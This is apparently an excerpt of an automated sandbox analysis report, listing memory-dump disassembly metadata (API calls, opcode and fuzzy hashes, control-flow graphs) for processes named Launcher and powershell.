                                                                                                                • #861.MFC42U(00B521A0,00000083,?,00000004,00B62D50,?,F6B930CF), ref: 00B6B3B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #324#540#861H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 2127517272-0
                                                                                                                • Opcode ID: e8a96542d7499df5fd3aa0216516970102f7f46fe2c724aa01898afdcb29a5f4
                                                                                                                • Instruction ID: 61f907bf4eea858a7c68145ebf3560b657ab2c7a6eac352d7fb388e339e7b46a
                                                                                                                • Opcode Fuzzy Hash: e8a96542d7499df5fd3aa0216516970102f7f46fe2c724aa01898afdcb29a5f4
                                                                                                                • Instruction Fuzzy Hash: E4E04FB6610306ABD715EBA8C952BAD76E1BFA5301F1040D9F60057382CFB88614CBA6
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #736#794#796#807
                                                                                                                • String ID:
                                                                                                                • API String ID: 2485769241-0
                                                                                                                • Opcode ID: 7e929939908b38b36b32e271a450ff2f2b2ac7c0d6288bbb9b3ed7143537eae3
                                                                                                                • Instruction ID: 36b3d0cdc95ddfdd74c3c42ce2e8fe511eff8b3c7b91b64f5ab847bdc9624a06
                                                                                                                • Opcode Fuzzy Hash: 7e929939908b38b36b32e271a450ff2f2b2ac7c0d6288bbb9b3ed7143537eae3
                                                                                                                • Instruction Fuzzy Hash: 42E0EC3A0026108BC325EF60E8D1ADAB3E0BF55311F2445FD947707251EFB4AA48CB90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #609$#693
                                                                                                                • String ID:
                                                                                                                • API String ID: 2192965535-0
                                                                                                                • Opcode ID: 47dad8d2d5b10863eb82b09fd0103e49d4160739d10ecf6356c750751c0a52cd
                                                                                                                • Instruction ID: 44ffa605a135fb279772932aafd3cb518ef226174c200946720b8ef446478ce0
                                                                                                                • Opcode Fuzzy Hash: 47dad8d2d5b10863eb82b09fd0103e49d4160739d10ecf6356c750751c0a52cd
                                                                                                                • Instruction Fuzzy Hash: 61D05E39111A12CBD33AFB30D451AEAF3D2EF54340F2145BEA5B703251AF74AA08C794
                                                                                                                APIs
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 00B6D4A1
                                                                                                                • wsprintfW.USER32 ref: 00B6D4B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromStringwsprintf
                                                                                                                • String ID: CLSID\%s\%s
                                                                                                                • API String ID: 1205525775-576494604
                                                                                                                • Opcode ID: d73f950a5959f3950ae91242152bde6d61cfb1a07265e41ba33f912d85cc97ee
                                                                                                                • Instruction ID: 069c9e30693cbc5b690ba4b52d81f6058c0ee8debc148472e6d342942931a3f8
                                                                                                                • Opcode Fuzzy Hash: d73f950a5959f3950ae91242152bde6d61cfb1a07265e41ba33f912d85cc97ee
                                                                                                                • Instruction Fuzzy Hash: 40F06D72A0020CAB8B00DF99DD459EF77FDEB86711B144065FD06AB150DB34AF09CBA1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4709#6195
                                                                                                                • String ID: System Configuration
                                                                                                                • API String ID: 513596607-3459905039
                                                                                                                • Opcode ID: 79db20bb84c0385140876430cc60495f34f0e07be59bdc4fa78d8937af1b2fe6
                                                                                                                • Instruction ID: cf47dddbf29095b319b9f027e7aee80bae5a61bea936ae716e0c160d7877f622
                                                                                                                • Opcode Fuzzy Hash: 79db20bb84c0385140876430cc60495f34f0e07be59bdc4fa78d8937af1b2fe6
                                                                                                                • Instruction Fuzzy Hash: F4B09226A6A2B02656B63174381289E00C99AC2A6139604FAB821A3341DC9CCE0603D4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 78753a86ff06ddd8bbcb7c09357a5333b737c18290997c55c40a515f308b4cea
                                                                                                                • Instruction ID: 8c86a46698b1ec762420cbf9cd2bb158ecf599a02232cbdc2cbb3c7de43155a0
                                                                                                                • Opcode Fuzzy Hash: 78753a86ff06ddd8bbcb7c09357a5333b737c18290997c55c40a515f308b4cea
                                                                                                                • Instruction Fuzzy Hash: 69F0B731410611DFD73A2B24E8097967FE1EB04722F16986DE0AA614B19B79ACC5CE04

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:5.5%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:3
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 28913 8426840 28914 8426883 SetThreadToken 28913->28914 28915 84268b1 28914->28915

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1057 b7b490-b7b4b9 1058 b7b4be-b7b7f9 call b7a9a4 1057->1058 1059 b7b4bb 1057->1059 1120 b7b7fe-b7b805 1058->1120 1059->1058
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 297b0115e4c3bc29dd56faac669d9e16fea2477d41495bf1f8ed1221efa5a800
                                                                                                                • Instruction ID: 4c3aa65255f74f3e4c1afba2c1a0e837aedc691d9f3fc0132e4fcbe357f986c0
                                                                                                                • Opcode Fuzzy Hash: 297b0115e4c3bc29dd56faac669d9e16fea2477d41495bf1f8ed1221efa5a800
                                                                                                                • Instruction Fuzzy Hash: 39918571B006555BDB29DFB489116AFBBF2EFC4700B00C92ED11AAB358DF346A058BD5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1121 b7b4a0-b7b4b9 1122 b7b4be-b7b7f9 call b7a9a4 1121->1122 1123 b7b4bb 1121->1123 1184 b7b7fe-b7b805 1122->1184 1123->1122
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 71097c83e6003df979e0cba0a113fdf36dd52876d1e718c0e63eb7ad5195390e
                                                                                                                • Instruction ID: ca4cda2cb0b2da49aa34496286f8e62e2d0cff3ba4062a952aca409a4a0ea22d
                                                                                                                • Opcode Fuzzy Hash: 71097c83e6003df979e0cba0a113fdf36dd52876d1e718c0e63eb7ad5195390e
                                                                                                                • Instruction Fuzzy Hash: D19175B1B006555BDB29DBB489116AFBBF6EFC4700B00C92ED11AAB358DF34A9058BC5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$pigh$pigh$pigh$pigh$pigh$tPkq$tPkq$tPkq$tPkq$tPkq$tPkq$|,ih$$kq$$kq$$kq
                                                                                                                • API String ID: 0-4139333840
                                                                                                                • Opcode ID: 402096090d319614810fbd0fb5c4408e59b47443ab606a4ce3cb1e8d9f950b22
                                                                                                                • Instruction ID: 9a5bdb3b315f06acb370e8e1afe3cbf2f771bfdce31049c2e80c054ed5a64911
                                                                                                                • Opcode Fuzzy Hash: 402096090d319614810fbd0fb5c4408e59b47443ab606a4ce3cb1e8d9f950b22
                                                                                                                • Instruction Fuzzy Hash: 77C24BB5B04306EFDB268B6898007AABBF5BFC6310F14807AD515CB2D1DB35D986C7A1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 491 71a3ce8-71a3d0d 492 71a3d13-71a3d18 491->492 493 71a3f00-71a3f4a 491->493 494 71a3d1a-71a3d20 492->494 495 71a3d30-71a3d34 492->495 503 71a40ce-71a4112 493->503 504 71a3f50-71a3f55 493->504 497 71a3d22 494->497 498 71a3d24-71a3d2e 494->498 499 71a3d3a-71a3d3c 495->499 500 71a3eb0-71a3eba 495->500 497->495 498->495 501 71a3d3e-71a3d4a 499->501 502 71a3d4c 499->502 505 71a3ec8-71a3ece 500->505 506 71a3ebc-71a3ec5 500->506 507 71a3d4e-71a3d50 501->507 502->507 520 71a4228-71a425d 503->520 521 71a4118-71a411d 503->521 509 71a3f6d-71a3f71 504->509 510 71a3f57-71a3f5d 504->510 511 71a3ed0-71a3ed2 505->511 512 71a3ed4-71a3ee0 505->512 507->500 515 71a3d56-71a3d75 507->515 516 71a4080-71a408a 509->516 517 71a3f77-71a3f79 509->517 518 71a3f5f 510->518 519 71a3f61-71a3f6b 510->519 514 71a3ee2-71a3efd 511->514 512->514 553 71a3d77-71a3d83 515->553 554 71a3d85 515->554 523 71a408c-71a4094 516->523 524 71a4097-71a409d 516->524 525 71a3f7b-71a3f87 517->525 526 71a3f89 517->526 518->509 519->509 544 71a428b-71a4295 520->544 545 71a425f-71a4281 520->545 533 71a411f-71a4125 521->533 534 71a4135-71a4139 521->534 530 71a409f-71a40a1 524->530 531 71a40a3-71a40af 524->531 529 71a3f8b-71a3f8d 525->529 526->529 529->516 536 71a3f93-71a3fb2 529->536 537 71a40b1-71a40cb 530->537 531->537 538 71a4129-71a4133 533->538 539 71a4127 533->539 540 71a41da-71a41e4 534->540 541 71a413f-71a4141 534->541 580 71a3fc2 536->580 581 71a3fb4-71a3fc0 536->581 538->534 539->534 548 71a41f1-71a41f7 540->548 549 71a41e6-71a41ee 540->549 542 71a4143-71a414f 541->542 543 71a4151 541->543 551 71a4153-71a4155 542->551 543->551 559 71a429f-71a42a5 544->559 560 71a4297-71a429c 544->560 591 71a4283-71a4288 545->591 592 71a42d5-71a42fe 545->592 556 71a41f9-71a41fb 548->556 557 71a41fd-71a4209 548->557 551->540 562 71a415b-71a415d 551->562 561 71a3d87-71a3d89 553->561 554->561 563 71a420b-71a4225 556->563 557->563 565 71a42ab-71a42b7 559->565 566 71a42a7-71a42a9 559->566 561->500 569 71a3d8f-71a3d96 561->569 567 71a415f-71a4165 562->567 568 71a4177-71a417e 562->568 573 71a42b9-71a42d2 565->573 566->573 575 71a4169-71a4175 567->575 576 71a4167 567->576 577 71a4180-71a4186 568->577 578 71a4196-71a41d7 568->578 569->493 579 71a3d9c-71a3da1 569->579 575->568 576->568 585 71a418a-71a4194 577->585 586 71a4188 577->586 588 71a3db9-71a3dc8 579->588 589 71a3da3-71a3da9 579->589 590 71a3fc4-71a3fc6 580->590 581->590 585->578 586->578 588->500 602 71a3dce-71a3dec 588->602 594 71a3dab 589->594 595 71a3dad-71a3db7 589->595 590->516 596 71a3fcc-71a4003 590->596 608 71a432d-71a435c 592->608 609 71a4300-71a4326 592->609 594->588 595->588 615 71a401d-71a4024 596->615 616 71a4005-71a400b 596->616 602->500 614 71a3df2-71a3e17 602->614 625 71a435e-71a437b 608->625 626 71a4395-71a439f 608->626 609->608 614->500 638 71a3e1d-71a3e24 614->638 621 71a403c-71a407d 615->621 622 71a4026-71a402c 615->622 618 71a400f-71a401b 616->618 619 71a400d 616->619 618->615 619->615 627 71a402e 622->627 628 71a4030-71a403a 622->628 639 71a437d-71a438f 625->639 640 71a43e5-71a43ea 625->640 629 71a43a8-71a43ae 626->629 630 71a43a1-71a43a5 626->630 627->621 628->621 634 71a43b0-71a43b2 629->634 635 71a43b4-71a43c0 629->635 637 71a43c2-71a43e2 634->637 635->637 642 71a3e6a-71a3e9d 638->642 643 71a3e26-71a3e41 638->643 639->626 640->639 656 71a3ea4-71a3ead 642->656 649 71a3e5b-71a3e5f 643->649 650 71a3e43-71a3e49 643->650 654 71a3e66-71a3e68 649->654 652 71a3e4b 650->652 653 71a3e4d-71a3e59 650->653 652->649 653->649 654->656
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                • API String ID: 0-1293621312
                                                                                                                • Opcode ID: aeec9b95337ad801d86b9023ea64d29c5ad8841a86569a6bb4bbf8964deb8833
                                                                                                                • Instruction ID: 3193df9a72e798050a36000cbcd4db6a23e0a541940734bee0e9762c6d270b65
                                                                                                                • Opcode Fuzzy Hash: aeec9b95337ad801d86b9023ea64d29c5ad8841a86569a6bb4bbf8964deb8833
                                                                                                                • Instruction Fuzzy Hash: E7124BB5704355EFCB169B6C98007AABFA2AFD1310F1480BAD915CB3D1DB72D846C7A2

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 661 8426840-84268af SetThreadToken 663 84268b1-84268b7 661->663 664 84268b8-84268d5 661->664 663->664
                                                                                                                APIs
                                                                                                                • SetThreadToken.KERNELBASE(?), ref: 084268A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1813447534.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_8420000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3254676861-0
                                                                                                                • Opcode ID: 3507026636535a8fb0c2cca30d8bf31cdc37d2417bf0cc38083ab640f4f83d6f
                                                                                                                • Instruction ID: d1660a077c396c220300f5bcc1f649b798a29b5bbe3381a754d1043ed291010b
                                                                                                                • Opcode Fuzzy Hash: 3507026636535a8fb0c2cca30d8bf31cdc37d2417bf0cc38083ab640f4f83d6f
                                                                                                                • Instruction Fuzzy Hash: B711F5B59002588FDB10DF9AC584B9EFBF8EF48324F24841AD458A7310D774A944CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 667 8426839-842687b 669 8426883-84268af SetThreadToken 667->669 670 84268b1-84268b7 669->670 671 84268b8-84268d5 669->671 670->671
                                                                                                                APIs
                                                                                                                • SetThreadToken.KERNELBASE(?), ref: 084268A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1813447534.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_8420000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3254676861-0
                                                                                                                • Opcode ID: 40a5050dc631b7f15a6803f2a75fadd0ee7280b39b1ca2291eb7bfcc818997db
                                                                                                                • Instruction ID: 695c405cb32b86c376700d981a087f6f79a7dfd817aecedf6f87b0a64ccb9879
                                                                                                                • Opcode Fuzzy Hash: 40a5050dc631b7f15a6803f2a75fadd0ee7280b39b1ca2291eb7bfcc818997db
                                                                                                                • Instruction Fuzzy Hash: 211133B59042488FDB10CF99C54479EFFF4AF88314F24842AD458A7250D7789944CFA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 674 b76fe0-b76fff 675 b77105-b77143 674->675 676 b77005-b77008 674->676 707 b7700a call b77697 676->707 708 b7700a call b7767c 676->708 677 b77010-b77022 679 b77024 677->679 680 b7702e-b77043 677->680 679->680 686 b770ce-b770e7 680->686 687 b77049-b77059 680->687 692 b770f2 686->692 693 b770e9 686->693 688 b77065-b77070 687->688 689 b7705b 687->689 702 b77073 call b7bee7 688->702 703 b77073 call b7bf20 688->703 704 b77073 call b7beb8 688->704 705 b77073 call b7bef8 688->705 706 b77073 call b7bec8 688->706 689->688 692->675 693->692 695 b77079-b7707d 696 b7707f-b7708f 695->696 697 b770bd-b770c8 695->697 698 b77091-b770a9 696->698 699 b770ab-b770b5 696->699 697->686 697->687 698->697 699->697 702->695 703->695 704->695 705->695 706->695 707->677 708->677
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (oq
                                                                                                                • API String ID: 0-3175707579
                                                                                                                • Opcode ID: 03b81d032334a70c7f4a6e0bc41a9244f399071e3374cc282706396f1a6b87f2
                                                                                                                • Instruction ID: 997081794a54dae8f341111802c0ea115fa74ae262f67871c65410303482436f
                                                                                                                • Opcode Fuzzy Hash: 03b81d032334a70c7f4a6e0bc41a9244f399071e3374cc282706396f1a6b87f2
                                                                                                                • Instruction Fuzzy Hash: 90413E347482048FCB14DB64C558AAEBBF1EF8E311F158099E406AB3A1DF35DD01CB60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 709 b7afa8-b7afb1 call b7a6a8 712 b7afb6-b7afba 709->712 713 b7afbc-b7afc9 712->713 714 b7afca-b7b065 712->714 720 b7b067-b7b06d 714->720 721 b7b06e-b7b08b 714->721 720->721
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (&kq
                                                                                                                • API String ID: 0-3641282905
                                                                                                                • Opcode ID: dc92117df1930310813e6e6f0bc576f80c414bfdef9b970cdc4ba6951d90bd52
                                                                                                                • Instruction ID: a9c840b7449bd671a783caa76c66a1859e3f58cb820dec4f77ac764d22431b77
                                                                                                                • Opcode Fuzzy Hash: dc92117df1930310813e6e6f0bc576f80c414bfdef9b970cdc4ba6951d90bd52
                                                                                                                • Instruction Fuzzy Hash: 4D21AE75A042588FCB14DFAED440B9FBFF5EB89320F24846AD419E7340CB7599058BA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 991 b74638-b7466a 992 b746b0 991->992 993 b7466c-b74673 991->993 996 b746b3-b746ef 992->996 994 b74675-b74682 993->994 995 b74684 993->995 998 b74686-b74688 994->998 995->998 1004 b74765-b74770 996->1004 1005 b746f1-b746fa 996->1005 999 b7468f-b74691 998->999 1000 b7468a-b7468d 998->1000 1002 b74693-b746a0 999->1002 1003 b746a2 999->1003 1007 b746ae 1000->1007 1009 b746a4-b746a6 1002->1009 1003->1009 1010 b74772-b74775 1004->1010 1011 b7477f-b747a1 1004->1011 1005->1004 1008 b746fc-b74702 1005->1008 1007->996 1013 b7495c-b7499c 1008->1013 1014 b74708-b74715 1008->1014 1009->1007 1010->1011 1019 b747a7-b747b0 1011->1019 1020 b7485c-b74896 1011->1020 1027 b7499e-b749aa 1013->1027 1028 b749ac 1013->1028 1015 b74717-b7473b 1014->1015 1016 b7475c-b74763 1014->1016 1030 b7473d-b74740 1015->1030 1031 b74758 1015->1031 1016->1004 1016->1008 1019->1013 1022 b747b6-b747e5 1019->1022 1046 b748a0-b748a6 1020->1046 1039 b747e7-b747fd 1022->1039 1040 b747ff-b74812 1022->1040 1032 b749ae-b749c9 1027->1032 1028->1032 1035 b74742-b74745 1030->1035 1036 b7474c-b74755 1030->1036 1031->1016 1035->1036 1041 b74814-b7481b 1039->1041 1040->1041 1044 b74840 1041->1044 1045 b7481d-b7482e 1041->1045 1044->1020 1045->1044 1049 b74830-b74839 1045->1049 1048 b748ad-b748d4 1046->1048 1052 b748d6-b748ec 1048->1052 1053 b748ee-b74901 1048->1053 1049->1044 1054 b74903-b7490a 1052->1054 1053->1054 1055 b7490c-b74912 1054->1055 1056 b74919 1054->1056 1055->1056 1056->1013
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 41670f092c6556d618744fb3809c6649946a03dfceef9dc0caac7db837000e2e
                                                                                                                • Instruction ID: 68861cffbc03102f343622240c62754d3946578aedc6a0d143c086d349774732
                                                                                                                • Opcode Fuzzy Hash: 41670f092c6556d618744fb3809c6649946a03dfceef9dc0caac7db837000e2e
                                                                                                                • Instruction Fuzzy Hash: 8CB11734A012089FCB15DFA8D584A9EFBF2EF89311F25C199E818AB365C771ED45CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1185 b729f0-b72a1e 1186 b72af5-b72b37 1185->1186 1187 b72a24-b72a3a 1185->1187 1192 b72c51-b72c61 1186->1192 1193 b72b3d-b72b56 1186->1193 1188 b72a3f-b72a52 1187->1188 1189 b72a3c 1187->1189 1188->1186 1194 b72a58-b72a65 1188->1194 1189->1188 1195 b72b5b-b72b69 1193->1195 1196 b72b58 1193->1196 1197 b72a67 1194->1197 1198 b72a6a-b72a7c 1194->1198 1195->1192 1202 b72b6f-b72b79 1195->1202 1196->1195 1197->1198 1198->1186 1203 b72a7e-b72a88 1198->1203 1204 b72b87-b72b94 1202->1204 1205 b72b7b-b72b7d 1202->1205 1206 b72a96-b72aa6 1203->1206 1207 b72a8a-b72a8c 1203->1207 1204->1192 1208 b72b9a-b72baa 1204->1208 1205->1204 1206->1186 1209 b72aa8-b72ab2 1206->1209 1207->1206 1210 b72baf-b72bbd 1208->1210 1211 b72bac 1208->1211 1212 b72ab4-b72ab6 1209->1212 1213 b72ac0-b72af4 1209->1213 1210->1192 1215 b72bc3-b72bd3 1210->1215 1211->1210 1212->1213 1217 b72bd5 1215->1217 1218 b72bd8-b72be5 1215->1218 1217->1218 1218->1192 1221 b72be7-b72bf7 1218->1221 1222 b72bfc-b72c08 1221->1222 1223 b72bf9 1221->1223 1222->1192 1225 b72c0a-b72c24 1222->1225 1223->1222 1226 b72c26 1225->1226 1227 b72c29 1225->1227 1226->1227 1228 b72c2e-b72c38 1227->1228 1229 b72c3d-b72c50 1228->1229
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 57d1b3fbd4b67da20b1e23455646e66b9547cafc9e131b0791b2a03cad6d46fb
                                                                                                                • Instruction ID: 7defd5d01b901f16cc5248f0075a15c0d279caba2282d8bc41e25e655bb52af1
                                                                                                                • Opcode Fuzzy Hash: 57d1b3fbd4b67da20b1e23455646e66b9547cafc9e131b0791b2a03cad6d46fb
                                                                                                                • Instruction Fuzzy Hash: E39139B4A006058FCB15CF59C5949AEFBF1FF88310B2485A9D929AB3A5C735EC51CBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce95f45ef427c2b4df8e69b9e7aa7af0ace60429bb0cbc939cdcff8578124ec5
                                                                                                                • Instruction ID: 59d8949b5c934a2768bc0f90771b111da7e3b314dcbc84a0001dc21fbd59b07a
                                                                                                                • Opcode Fuzzy Hash: ce95f45ef427c2b4df8e69b9e7aa7af0ace60429bb0cbc939cdcff8578124ec5
                                                                                                                • Instruction Fuzzy Hash: F9612371E012489FCB15CFA9D985B9DBFF1EF88310F14C1AAE819AB265EB309845CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 929e37889d5614f7f9d4dd9761a656d123970f9f98aff4358311a8f70ba17ccb
                                                                                                                • Instruction ID: 44fe9364704713760a5fbf7665c680e0f084b424e24e71692e2aaa164d82c103
